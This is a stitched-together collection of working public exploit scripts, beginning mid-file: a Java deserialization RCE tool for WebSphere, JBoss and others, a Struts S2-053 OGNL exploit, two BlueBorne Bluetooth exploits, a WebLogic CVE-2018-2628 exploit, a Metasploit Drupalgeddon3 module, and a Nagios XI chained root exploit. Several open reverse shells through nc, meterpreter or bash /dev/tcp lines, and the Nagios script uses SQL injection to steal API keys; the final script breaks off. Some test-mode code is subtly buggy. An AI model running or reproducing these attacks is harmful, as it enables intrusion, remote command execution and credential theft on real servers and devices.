c2VBcHBMYXVuY2hlci5qYXZhdAAOcnVuQXBwbGljYXRpb25zcQB+AA4AAABPdAA8b3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmludGVybmFsLmFkYXB0b3IuRWNsaXBzZUFwcExhdW5jaGVydAAXRWNsaXBzZUFwcExhdW5jaGVyLmphdmF0AAVzdGFydHNxAH4ADgAAAXF0AC9vcmcuZWNsaXBzZS5jb3JlLnJ1bnRpbWUuYWRhcHRvci5FY2xpcHNlU3RhcnRlcnQAE0VjbGlwc2VTdGFydGVyLmphdmF0AANydW5zcQB+AA4AAACzdAAvb3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmFkYXB0b3IuRWNsaXBzZVN0YXJ0ZXJ0ABNFY2xpcHNlU3RhcnRlci5qYXZhdAADcnVuc3EAfgAO/////nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAABVHQAHm9yZy5lY2xpcHNlLmNvcmUubGF1bmNoZXIuTWFpbnQACU1haW4uamF2YXQAD2ludm9rZUZyYW1ld29ya3NxAH4ADgAAARp0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AAhiYXNpY1J1bnNxAH4ADgAAA9V0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AANydW5zcQB+AA4AAAGQdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQADWxhdW5jaEVjbGlwc2VzcQB+AA4AAACjdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQABG1haW5wcHBwcHBwcHB4" xmlns:ns0="admin" ns0:WASRemoteRuntimeVersion="8.5.5.7" ns0:JMXMessageVersion="1.2.0" ns0:JMXVersion="1.2.0">
</SOAP-ENV:Header>
<SOAP-ENV:Body>
<ns1:invoke xmlns:ns1="urn:AdminService" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<objectname xsi:type="ns1:javax.management.ObjectName">rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==</objectname>
<operationname xsi:type="xsd:string">getUnsavedChanges</operationname>
<params xsi:type="ns1:[Ljava.lang.Object;">%s</params>
<signature xsi:type="ns1:[Ljava.lang.String;">rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24=</signature>
</ns1:invoke>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>""" % serObjB64_3 # Append the payload to the request body.
if SSL_On:
webservice = httplib2.Http(disable_ssl_certificate_validation=True)
URL_ADDR = "%s://%s:%s" % ('https',HOST,PORT)
else:
webservice = httplib2.Http()
URL_ADDR = "%s://%s:%s" % ('http',HOST,PORT)
headers = {"User-Agent":"WebSphere_RCE_POC",
"Content-type":"text/xml; charset=\"UTF-8\"",
"SOAPAction":"\"urn:AdminService\"",
"Content-length":"%d" % len(body)
}
print("[i] Sending attack payload to %s" % URL_ADDR)
resp, content = webservice.request(URL_ADDR+"/", "POST", body=body, headers=headers)
# print provided response.
print("[i] Response received from target: %s" % resp)
if __name__ == "__main__":
#
# Main function
#
if not sys.version_info >= (3, 0):
sys,exit("[x] WARNING - this script requires Python 3.x. Exiting")
# Setup command line arguments
cmdparser = argparse.ArgumentParser(prog="serialator", usage="""
____ _ _ _
/ ___| ___ _ __(_) __ _| | __ _| |_ ___ _ __
\___ \ / _ \ '__| |/ _` | |/ _` | __/ _ \| '__|
___) | __/ | | | (_| | | (_| | || (_) | |
|____/ \___|_| |_|\__,_|_|\__,_|\__\___/|_|
by Nikhil Sreekumar (@roo7break) v {version}
Usage: python3 %(prog)s [options]
Options:
-t Target (required)
-p Port (required)
-c CMD (required)
--serv Target Service (default: websphere)
--ssl Use SSL (default: OFF)
--test Test if target is vulnerable (default: OFF)
""".format(version=version), formatter_class=argparse.RawTextHelpFormatter)
cmdparser.add_argument("-t", "--target", default="127.0.0.1", help="Target host", required=True)
cmdparser.add_argument("-p", "--port", default="", type=int, help="Target port", required=True)
cmdparser.add_argument("-c", "--cmd", default="", help="OS command to execute")
cmdparser.add_argument("--serv", default="websphere", choices=["websphere", "opennms", "jboss","symantec"])
cmdparser.add_argument("--ssl", action="store_true", help="Use SSL for target service")
cmdparser.add_argument("--test", action="store_true", help="Use to test for vulnerability")
cmdargs = cmdparser.parse_args()
if cmdargs.test:
answ = input("[i] Before we start, I highly recommend you start Wireshark (filter: icmp.type == 8) or ICMPListener, now. Ready? (y/yes) ")
if answ.lower() == 'y' or answ.lower() == 'yes':
print("[i] Awesome. Lets ask the target server to ping our system")
tgtos = input("[?] What do you think the target OS is (win/unix): ")
if tgtos.lower == "win":
host_ip = input("[?] Provide LHOST: ")
print("[i] Windows target selected. Sending \'ping -n 5 <attack_ip>'\ to target.")
cmdargs.cmd == "ping -n 5 %s" % host_ip
else:
host_ip = input("[?] Provide LHOST: ")
print("[i] Unix target selected. Sending \'ping -c 5 <attack_ip>'\ to target.")
cmdargs.cmd == "ping -n 5 %s" % host_ip
else:
print("[i] Lazy bugger.. right, I am gonna continue anyway.")
if cmdargs.serv == "websphere":
print("[i] WebSphere selected as target app.")
if cmdargs.test:
websphere_attack(cmdargs.target, cmdargs.port, cmdargs.ssl, cmdargs.cmd)
else:
if cmdargs.cmd == None:
sys.exit("[x] You didnt provide any command to run. Exiting..")
websphere_attack(cmdargs.target, cmdargs.port, cmdargs.ssl, cmdargs.cmd)
elif cmdargs.serv == "opennms":
print("[i] OpenNMS selected as target app.")
if cmdargs.test:
opennms_attack(cmdargs.target, cmdargs.port, cmdargs.cmd)
else:
if cmdargs.cmd == None:
sys.exit("[x] You didnt provide any command to run. Exiting..")
opennms_attack(cmdargs.target, cmdargs.port, cmdargs.cmd)
elif cmdargs.serv == "jboss":
print("[i] JBoss selected as target app.")
if cmdargs.test:
jboss_attack(cmdargs.target, cmdargs.port, cmdargs.ssl, cmdargs.cmd)
else:
if cmdargs.cmd == None:
sys.exit("[x] You didnt provide any command to run. Exiting..")
jboss_attack(cmdargs.target, cmdargs.port, cmdargs.ssl, cmdargs.cmd)
else:
print("[i] Symantec Endpoint selected as target app.")
if cmdargs.test:
symantec_endpoint_attack(cmdargs.target, cmdargs.port, cmdargs.ssl, cmdargs.cmd)
else:
if cmdargs.cmd == None:
sys.exit("[x] You didnt provide any command to run. Exiting..")
symantec_endpoint_attack(cmdargs.target, cmdargs.port, cmdargs.ssl, cmdargs.cmd)
print("[i] Thank you for using this tool. Contact author for any comments.")
import requests
import sys
from urllib import quote
def exploit(url):
res = requests.get(url, timeout=10)
if res.status_code == 200:
print "[+] Response: {}".format(str(res.text))
print "\n[+] Exploit Finished!"
else:
print "\n[!] Exploit Failed!"
if __name__ == "__main__":
if len(sys.argv) != 4:
print """****S2-053 Exploit****
Usage:
exploit.py <url> <param> <command>
Example:
exploit.py "http://127.0.0.1/" "name" "uname -a"
"""
exit()
url = sys.argv[1]
param = sys.argv[2]
command = sys.argv[3]
#payload = "%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+command+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"""
# Can show the echo message
payload = "%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+command+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}"
link = "{}/?{}={}".format(url, param, quote(payload))
print "[*] Generated EXP: {}".format(link)
print "\n[*] Exploiting..."
exploit(link)
from pwn import *
import bluetooth
if not 'TARGET' in args:
log.info("Usage: CVE-2017-0785.py TARGET=XX:XX:XX:XX:XX:XX")
exit()
target = args['TARGET']
service_long = 0x0100
service_short = 0x0001
mtu = 50
n = 30
def packet(service, continuation_state):
pkt = '\x02\x00\x00'
pkt += p16(7 + len(continuation_state))
pkt += '\x35\x03\x19'
pkt += p16(service)
pkt += '\x01\x00'
pkt += continuation_state
return pkt
p = log.progress('Exploit')
p.status('Creating L2CAP socket')
sock = bluetooth.BluetoothSocket(bluetooth.L2CAP)
bluetooth.set_l2cap_mtu(sock, mtu)
context.endian = 'big'
p.status('Connecting to target')
sock.connect((target, 1))
p.status('Sending packet 0')
sock.send(packet(service_long, '\x00'))
data = sock.recv(mtu)
if data[-3] != '\x02':
log.error('Invalid continuation state received.')
stack = ''
for i in range(1, n):
p.status('Sending packet %d' % i)
sock.send(packet(service_short, data[-3:]))
data = sock.recv(mtu)
stack += data[9:-3]
sock.close()
p.success('Done')
print hexdump(stack)
# -*- coding: utf-8 -*-
# Oracle Weblogic Server (10.3.6.0, 12.1.3.0, 12.2.1.2, 12.2.1.3) Deserialization Remote Command Execution Vulnerability (CVE-2018-2628)
#
# IMPORTANT: Is provided only for educational or information purposes.
#
# Credit: Thanks by Liao Xinxi of NSFOCUS Security Team
# Reference: http://mp.weixin.qq.com/s/nYY4zg2m2xsqT0GXa9pMGA
#
# How to exploit:
# 1. run below command on JRMPListener host
# 1) wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
# 2) java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]
# e.g. java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'nc -nv 10.0.0.5 4040'
# 2. start a listener on attacker host
# e.g. nc -nlvp 4040
# 3. run this script on attacker host
# 1) wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
# 2) python exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]
# e.g.
# a) python exploit.py 10.0.0.11 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 10.0.0.5 1099 JRMPClient (Using java.rmi.registry.Registry)
# b) python exploit.py 10.0.0.11 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 10.0.0.5 1099 JRMPClient2 (Using java.rmi.activation.Activator)
from __future__ import print_function
import binascii
import os
import socket
import sys
import time
def generate_payload(path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client):
#generates ysoserial payload
command = 'java -jar {} {} {}:{} > payload.out'.format(path_ysoserial, jrmp_client, jrmp_listener_ip, jrmp_listener_port)
print("command: " + command)
os.system(command)
bin_file = open('payload.out','rb').read()
return binascii.hexlify(bin_file)
def t3_handshake(sock, server_addr):
sock.connect(server_addr)
sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
time.sleep(1)
sock.recv(1024)
print('handshake successful')
def build_t3_request_object(sock, port):
data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(dport))
data3 = '1a7727000d3234322e323134'
data4 = '2e312e32353461863d1d0000000078'
for d in [data1,data2,data3,data4]:
sock.send(d.decode('hex'))
time.sleep(2)
print('send request payload successful,recv length:%d'%(len(sock.recv(2048))))
def send_payload_objdata(sock, data):
payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
payload+=data
payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)
sock.send(payload.decode('hex'))
time.sleep(2)
sock.send(payload.decode('hex'))
res = ''
try:
while True:
res += sock.recv(4096)
time.sleep(0.1)
except Exception:
pass
return res
def exploit(dip, dport, path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(65)
server_addr = (dip, dport)
t3_handshake(sock, server_addr)
build_t3_request_object(sock, dport)
payload = generate_payload(path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client)
print("payload: " + payload)
rs=send_payload_objdata(sock, payload)
print('response: ' + rs)
print('exploit completed!')
if __name__=="__main__":
#check for args, print usage if incorrect
if len(sys.argv) != 7:
print('\nUsage:\nexploit.py [victim ip] [victim port] [path to ysoserial] '
'[JRMPListener ip] [JRMPListener port] [JRMPClient]\n')
sys.exit()
dip = sys.argv[1]
dport = int(sys.argv[2])
path_ysoserial = sys.argv[3]
jrmp_listener_ip = sys.argv[4]
jrmp_listener_port = sys.argv[5]
jrmp_client = sys.argv[6]
exploit(dip, dport, path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client)
from pwn import *
import bluetooth
if not 'TARGET' in args:
log.info('Usage: python CVE-2017-0781.py TARGET=XX:XX:XX:XX:XX:XX')
exit()
target = args['TARGET']
count = 30 # Amount of packets to send
port = 0xf # BT_PSM_BNEP
context.arch = 'arm'
BNEP_FRAME_CONTROL = 0x01
BNEP_SETUP_CONNECTION_REQUEST_MSG = 0x01
def set_bnep_header_extension_bit(bnep_header_type):
"""
If the extension flag is equal to 0x1 then
one or more extension headers follows the BNEP
header; If extension flag is equal to 0x0 then the
BNEP payload follows the BNEP header.
"""
return bnep_header_type | 128
def bnep_control_packet(control_type, control_packet):
return p8(control_type) + control_packet
def packet(overflow):
pkt = ''
pkt += p8(set_bnep_header_extension_bit(BNEP_FRAME_CONTROL))
pkt += bnep_control_packet(BNEP_SETUP_CONNECTION_REQUEST_MSG, '\x00' + overflow)
return pkt
bad_packet = packet('AAAABBBB')
log.info('Connecting...')
sock = bluetooth.BluetoothSocket(bluetooth.L2CAP)
bluetooth.set_l2cap_mtu(sock, 1500)
sock.connect((target, port))
log.info('Sending BNEP packets...')
for i in range(count):
sock.send(bad_packet)
log.success('Done.')
sock.close()
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'Drupalgeddon3',
'Description' => %q{
CVE-2018-7602 / SA-CORE-2018-004
A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x.
This potentially allows attackers to exploit multiple attack vectors on a Drupal site
Which could result in the site being compromised.
This vulnerability is related to Drupal core - Highly critical - Remote Code Execution
The module can load msf PHP arch payloads, using the php/base64 encoder.
The resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));'
},
'License' => MSF_LICENSE,
'Author' =>
[
'SixP4ck3r', # Research and port to MSF
'Blaklis' # Initial PoC
],
'References' =>
[
['SA-CORE', '2018-004'],
['CVE', '2018-7602'],
],
'DefaultOptions' =>
{
'encoder' => 'php/base64',
'payload' => 'php/meterpreter/reverse_tcp',
},
'Privileged' => false,
'Platform' => ['php'],
'Arch' => [ARCH_PHP],
'Targets' =>
[
['User register form with exec', {}],
],
'DisclosureDate' => 'Apr 29 2018',
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [ true, "The target URI of the Drupal installation", '/']),
OptString.new('DRUPAL_NODE', [ true, "Exist Node Number (Page, Article, Forum topic, or a Post)", '1']),
OptString.new('DRUPAL_SESSION', [ true, "Authenticated Cookie Session", '']),
])
register_advanced_options(
[
])
end
def uri_path
normalize_uri(target_uri.path)
end
def start_exploit
drupal_node = datastore['DRUPAL_NODE']
res = send_request_cgi({
'cookie' => datastore['DRUPAL_SESSION'],
'method' => 'GET',
'uri' => "#{uri_path}/node/#{drupal_node}/delete"
})
form_token = res.body.scan( /form_token" value="([^>]*)" \/>/).last.first
print "[*] Token Form -> #{form_token}\n"
r2 = send_request_cgi({
'method' => 'POST',
'cookie' => datastore['DRUPAL_SESSION'],
'uri' => "#{uri_path}/?q=node/#{drupal_node}/delete&destination=node?q[%2523post_render][]=passthru%26q[%2523type]=markup%26q[%2523markup]=php%20-r%20'#{payload.encoded}'",
'vars_post' => {
'form_id' => 'node_delete_confirm',
'_triggering_element_name' => 'form_id',
'form_token'=> "#{form_token}"
}
})
form_build_id = r2.body.scan( /form_build_id" value="([^>]*)" \/>/).last.first
print "[*] Token Form_build_id -> #{form_build_id}\n"
r3 = send_request_cgi({
'method' => 'POST',
'cookie' => datastore['DRUPAL_SESSION'],
'uri' => "#{uri_path}/?q=file/ajax/actions/cancel/%23options/path/#{form_build_id}",
'vars_post' => {
'form_build_id' => "#{form_build_id}"
}
})
end
def exploit
case datastore['TARGET']
when 0
start_exploit
else
fail_with(Failure::BadConfig, "Your target is invalid.")
end
end
end
# Exploit Title: Nagios XI 5.2.[6-9], 5.3, 5.4 Chained Remote Root
# Date: 4/17/2018
# Exploit Authors: Benny Husted, Jared Arave, Cale Smith
# Contact: https://twitter.com/iotennui || https://twitter.com/BennyHusted || https://twitter.com/0xC413
# Vendor Homepage: https://www.nagios.com/
# Software Link: https://assets.nagios.com/downloads/nagiosxi/5/ovf/nagiosxi-5.4.10-64.ova
# Version: Nagios XI versions 5.2.[6-9], 5.3, 5.4
# Tested on: CentOS 6.7
# CVE: CVE-2018-8733, CVE-2018-8734, CVE-2018-8735, CVE-2018-8736
import httplib
import urllib
import ssl
import sys
import base64
import random
import time
import string
import json
import re
from optparse import OptionParser
# Print some helpful words:
print """
###############################################################################
Nagois XI 5.2.[6-9], 5.3, 5.4 Chained Remote Root
This exploit leverages the vulnerabilities enumerated in these CVES:
[ CVE-2018-8733, CVE-2018-8734, CVE-2018-8735, CVE-2018-8736 ]
More details here:
http://blog.redactedsec.net/exploits/2018/04/26/nagios.html
Steps are as follows:
0. Determine Version
1. Change the database user to root:nagiosxi
2. Get an API key w/ SQLi
3. Use the API Key to add an administrative user
4. Login as that administrative user
5. Do some authenticated RCE w/ privesc
6. Cleanup.
###############################################################################
"""
# TODO: Figure out what port it's running on, 80 or 443.
def parse_apikeys(resp):
begin_delim = 'START_API:'
end_delim = ':END_API'
start_indecies = [m.start() for m in re.finditer(begin_delim, resp)]
end_indecies = [m.start() for m in re.finditer(end_delim, resp)]
unique_keys = []
for i, index in enumerate(start_indecies):
start_index = index + len(begin_delim)
end_index = end_indecies[i]
key = resp[start_index:end_index]
if not key in unique_keys:
unique_keys.append(key)
return unique_keys
def parse_nsp_str(resp):
begin_delim = 'var nsp_str = "'
end_delim = '";\n'
start_index = resp.find(begin_delim) + len(begin_delim)
resp = resp[start_index:]
end_index = resp.find(end_delim)
return resp[:end_index]
def parse_cmd_id(resp, cmdname):
begin_delim = "'"
end_delim = "', '{0}')\"><img src='images/cross.png' alt='Delete'>".format(cmdname)
end_idx = resp.find(end_delim)
resp = resp[:end_idx]
resp = resp[resp.rfind(begin_delim)+1:]
return resp
def parse_nagiosxi(resp):
resp = str(resp)
begin_delim = 'Set-Cookie: nagiosxi='
end_delim = ';'
# find the last instance of the nagiosxi cookie...
start_index = resp.rfind(begin_delim) + len(begin_delim)
resp = resp[start_index:]
end_index = resp.find(end_delim)
return resp[:end_index]
def parse_version(resp):
resp = str(resp)
begin_delim = 'name="version" value="'
end_delim = '"'
start_index = resp.rfind(begin_delim) + len(begin_delim)
resp = resp[start_index:]
end_index = resp.find(end_delim)
return resp[:end_index]
def change_db_user(usr, pwd, step):
url = '/nagiosql/admin/settings.php'
headers = {'Host' : RHOST,
'Content-Type' : 'application/x-www-form-urlencoded'}
params = urllib.urlencode({
'txtRootPath':'nagiosql',
'txtBasePath':'/var/www/html/nagiosql/',
'selProtocol':'http',
'txtTempdir':'/tmp',
'selLanguage':'en_GB',
'txtEncoding':'utf-8',
'txtDBserver':'localhost',
'txtDBport':3306,
'txtDBname':'nagiosql',
'txtDBuser': usr,
'txtDBpass':pwd,
'txtLogoff':3600,
'txtLines':15,
'selSeldisable':1
})
print "[+] STEP {0}: Setting Nagios QL DB user to {1}.".format(step, usr)
print "[+] STEP {0}: http://{1}{2}".format(step, RHOST, url)
con = httplib.HTTPConnection(RHOST, 80)
con.set_debuglevel(0)
con.request("POST", url, params, headers=headers)
resp = con.getresponse()
con.close()
return resp
# Disable SSL Cert validation
if hasattr(ssl, '_create_unverified_context'):
ssl._create_default_https_context = ssl._create_unverified_context
# Parse command line args:
usage = "Usage: %prog -r <appliance_ip> -l <listener_ip> -p <listener_port>\n"\
" %prog -r <appliance_ip> -c 'touch /tmp/foooooooooooo'"
parser = OptionParser(usage=usage)
parser.add_option("-r", '--RHOST', dest='rhost', action="store",
help="Target Nagios XI host")
parser.add_option("-l", '--LHOST', dest='lhost', action="store",
help="Host listening for reverse shell connection")
parser.add_option("-p", '--LPORT', dest='lport', action="store",
help="Port on which nc is listening")
parser.add_option("-c", '--cmd', dest='cmd', action="store",
help="Run a custom command, no reverse shell for you.")
(options, args) = parser.parse_args()
if not options.rhost:
parser.error("[!] No remote host specified.\n")
parser.print_help()
sys.exit(1)
RHOST = options.rhost
LHOST = options.lhost
LPORT = options.lport
if options.cmd:
cmd = options.cmd
else:
cmd = 'bash -i >& /dev/tcp/{0}/{1} 0>&1 &'.format(LHOST, LPORT)
################################################################
# REQUEST ZERO: GET NAGIOS VERSION
################################################################
url0 = '/nagiosxi/login.php'
headers0 = {'Host' : RHOST,
'Content-Type' : 'application/x-www-form-urlencoded'}
print "[+] STEP 0: Get Nagios XI version string."
print "[+] STEP 0: http://{0}{1}".format(RHOST, url0)
con0 = httplib.HTTPConnection(RHOST, 80)
con0.set_debuglevel(0)
con0.request("POST", url0, headers=headers0)
r0 = con0.getresponse()
r0_resp = r0.read()
version = parse_version(r0_resp)
ver_int = int(version.split('.')[1])
con0.close()
print "[+] STEP 0: Nagios XI verions is: {0}".format(version)
################################################################
# REQUEST ONE: CHANGE THE DATABASE USER TO ROOT
################################################################
r1 = change_db_user('root', 'nagiosxi', '1')
if r1.status == 302:
print "[+] STEP 1: Received a 302 Response. That's good!"
else:
print "[!] STEP 1: Received a {0} Response. That's bad.".format(str(r1.status))
exit()
################################################################
# REQUEST TWO: GET THE API KEY USING SQLi
################################################################
print ""
url2 = '/nagiosql/admin/helpedit.php'
headers2 = {'Host' : RHOST,
'Content-Type' : 'application/x-www-form-urlencoded'}
# Versions of NagiosXI < 5.3.0 use 'backend_ticket', not 'api_key'.
sqli_param = "api_key" if (ver_int >= 3) else "backend_ticket"
print sqli_param
params2 = urllib.urlencode({
'selInfoKey1':'c\'UNION SELECT CONCAT(\'START_API:\',{0},\':END_API\') FROM nagiosxi.xi_users-- '.format(sqli_param),
'hidKey1':'common',
'selInfoKey2':'free_variables_name',
'hidKey2':'',
'selInfoVersion':'',
'hidVersion':'',
'taContent':'',
'modus':0,
'':''
})
print "[+] STEP 2: Exploiting SQLi to extract user API keys."
print "[+] STEP 2: http://{0}{1}".format(RHOST, url2)
con2 = httplib.HTTPConnection(RHOST, 80)
con2.set_debuglevel(1)
con2.request("POST", url2, params2, headers=headers2)
r2 = con2.getresponse()
if r2.status == 302:
print "[+] STEP 2: Received a 302 Response. That's good!"
else:
print "[!] STEP 2: Received a {0} Response. That's bad.".format(str(r2.status))
exit()
con2.close()
